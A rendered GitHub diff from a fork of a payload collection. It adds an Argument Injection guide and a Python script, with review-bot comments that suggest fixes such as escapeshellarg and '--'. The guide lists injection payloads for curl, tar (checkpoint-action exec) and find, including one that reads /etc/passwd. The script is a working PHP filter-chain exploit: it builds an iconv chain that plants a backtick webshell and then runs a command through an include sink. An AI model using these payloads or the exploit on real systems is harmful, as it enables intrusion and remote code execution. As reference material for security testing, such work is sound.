forked from swisskyrepo/PayloadsAllTheThings
Showing 78 changed files with 4,702 additions and 372 deletions.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,4 +1,3 @@ | ||
BuildPDF/ | ||
.vscode | ||
.todo | ||
AWS Amazon Lambda/ | ||
.todo |
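Review bot: the +/- markers have been dropped in this rendering, so the intent has to be read from the header: `@@ -1,4 +1,3 @@` is one net line removed, and the visible lines make `AWS Amazon Lambda/` the entry that disappears from .gitignore while `.todo` stays. If that directory is meant to be tracked from now on, the commit message should say so; if it simply no longer exists in the tree, one line saying that avoids the question at review time.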
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,89 @@ | ||
# Argument Injection | ||
Argument injection is similar to command injection as tainted data is passed to to a command executed in a shell without proper sanitization/escaping. | ||
|
||
It can happen in different situations, where you can only inject arguments to a command: | ||
|
||
- Improper sanitization (regex) | ||
- Injection of arguments into a fixed command (PHP:escapeshellcmd, Python: Popen) | ||
- Bash expansion (ex: *) | ||
|
||
In the following example, a python script takes the inputs from the command line to generate a ```curl``` command: | ||
```py | ||
from shlex import quote,split | ||
import sys | ||
import subprocess | ||
|
||
if __name__=="__main__": | ||
command = ['curl'] | ||
command = command + split(sys.argv[1]) | ||
print(command) | ||
r = subprocess.Popen(command) | ||
``` | ||
It is possible for an attacker to pass several words to abuse options from ```curl``` command | ||
```ps1 | ||
python python_rce.py "https://www.google.fr -o test.py" | ||
``` | ||
We can see by printing the command that all the parameters are splited allowing to inject an argument that will save the response in an arbitrary file. | ||
```ps1 | ||
['curl', 'https://www.google.fr', '-o', 'test.py'] | ||
``` | ||
## Summary | ||
|
||
* [List of exposed commands](#list-of-exposed-commands) | ||
* [TAR](#TAR) | ||
* [CURL](#CURL) | ||
* [WGET](#WGET) | ||
* [References](#references) | ||
|
||
|
||
## List of exposed commands | ||
|
||
### CURL | ||
It is possible to abuse ```curl``` through the following options: | ||
|
||
```ps1 | ||
-o, --output <file> Write to file instead of stdout | ||
-O, --remote-name Write output to a file named as the remote file | ||
``` | ||
In case there is already one option in the command it is possible to inject several URLs to download and several output options. Each option will affect each URL in sequence. | ||
|
||
### TAR | ||
For the ```tar``` command it is possible to inject arbitrary arguments in different commands. | ||
|
||
Argument injection can happen into the '''extract''' command: | ||
```ps1 | ||
--to-command <command> | ||
--checkpoint=1 --checkpoint-action=exec=<command> | ||
-T <file> or --files-from <file> | ||
``` | ||
|
||
Or in the '''create''' command: | ||
```ps1 | ||
-I=<program> or -I <program> | ||
--use-compres-program=<program> | ||
``` | ||
There are also short options to work without spaces: | ||
```ps1 | ||
-T<file> | ||
-I"/path/to/exec" | ||
``` | ||
|
||
### FIND | ||
Find some_file inside /tmp directory. | ||
```php | ||
$file = "some_file"; | ||
system("find /tmp -iname ".escapeshellcmd($file)); | ||
``` | ||
|
||
Print /etc/passwd content. | ||
```php | ||
$file = "sth -or -exec cat /etc/passwd ; -quit"; | ||
system("find /tmp -iname ".escapeshellcmd($file)); | ||
``` | ||
|
||
|
||
## References | ||
|
||
- [staaldraad - Etienne Stalmans, November 24, 2019](https://staaldraad.github.io/post/2019-11-24-argument-injection/) | ||
- [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic, 06/25/2014](https://www.exploit-db.com/papers/33930) | ||
- [TL;DR: How exploit/bypass/use PHP escapeshellarg/escapeshellcmd functions - kacperszurek, Apr 25, 2018](https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md) |
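Review bot: the write-up shows the injection in the Python and PHP examples but never states the fix, which is what most readers of an Argument Injection page will look for next to the payloads. For the `subprocess.Popen` example, pass the user value as a single list element instead of running `shlex.split` on untrusted input, and for tools that honour it put `--` before the positional arguments so a value such as `-o test.py` cannot be read as an option; for the `find` example, `escapeshellcmd` is the wrong primitive because it only neutralises shell metacharacters and leaves `-or -exec cat /etc/passwd ; -quit` intact as separate arguments, whereas `escapeshellarg($file)` quotes the whole value as one argument (the kacperszurek reference already cited covers this distinction). Smaller points: "passed to to a command" and "splited" are typos; `--use-compres-program` should be `--use-compress-program`, and GNU tar's short form is `-I <program>` or `-I<program>`, so `-I=<program>` would hand tar a program named `=<program>`; `'''extract'''` and `'''create'''` use triple single quotes where the rest of the file uses backticks; the Summary links `#TAR`, `#CURL` and `#WGET` will not resolve on GitHub (anchors are lowercase, there is no WGET section) and the FIND section is missing from the list; `from shlex import quote,split` imports `quote` without using it; and the `ps1` fence tag on POSIX shell snippets and on curl/tar option listings should be `bash` or `text`.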
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,60 @@ | ||
import requests | ||
|
||
url = "http://localhost:8000/chall.php" | ||
file_to_use = "/etc/passwd" | ||
command = "id" | ||
|
||
#<?=`$_GET[0]`;;?> | ||
base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4" | ||
|
||
conversions = { | ||
'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2', | ||
'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2', | ||
'C': 'convert.iconv.UTF8.CSISO2022KR', | ||
'8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2', | ||
'9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB', | ||
'f': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213', | ||
's': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61', | ||
'z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS', | ||
'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932', | ||
'P': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213', | ||
'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5', | ||
'0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2', | ||
'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2', | ||
'W': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2', | ||
'd': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2', | ||
'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2', | ||
'7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2', | ||
'4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2' | ||
} | ||
|
||
|
||
# generate some garbage base64 | ||
filters = "convert.iconv.UTF8.CSISO2022KR|" | ||
filters += "convert.base64-encode|" | ||
# make sure to get rid of any equal signs in both the string we just generated and the rest of the file | ||
filters += "convert.iconv.UTF8.UTF7|" | ||
|
||
|
||
for c in base64_payload[::-1]: | ||
filters += conversions[c] + "|" | ||
# decode and reencode to get rid of everything that isn't valid base64 | ||
filters += "convert.base64-decode|" | ||
filters += "convert.base64-encode|" | ||
# get rid of equal signs | ||
filters += "convert.iconv.UTF8.UTF7|" | ||
|
||
filters += "convert.base64-decode" | ||
|
||
final_payload = f"php://filter/{filters}/resource={file_to_use}" | ||
|
||
with open('payload', 'w') as f: | ||
f.write(final_payload) | ||
|
||
r = requests.get(url, params={ | ||
"0": command, | ||
"action": "include", | ||
"file": final_payload | ||
}) | ||
|
||
print(r.text) |
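Review bot: `requests.get(url, params=...)` has no `timeout`, so the script hangs indefinitely when the target stalls; add `timeout=10` or similar. The `conversions` table covers exactly the characters that occur in `base64_payload` (`PD89YCRfR0VUWzBdYDs7Pz4`), so changing that string raises a `KeyError` on the first unmapped character; a comment above the dict saying the table is specific to this payload would save the next reader a debugging session. `url`, `file_to_use` and `command` are hardcoded and the generated chain is written without comment to a file named `payload` in the current directory; a short module docstring should state what the script is (a proof-of-concept against an `action=include&file=` include sink), which values need editing, and that the chain is also saved to `payload`.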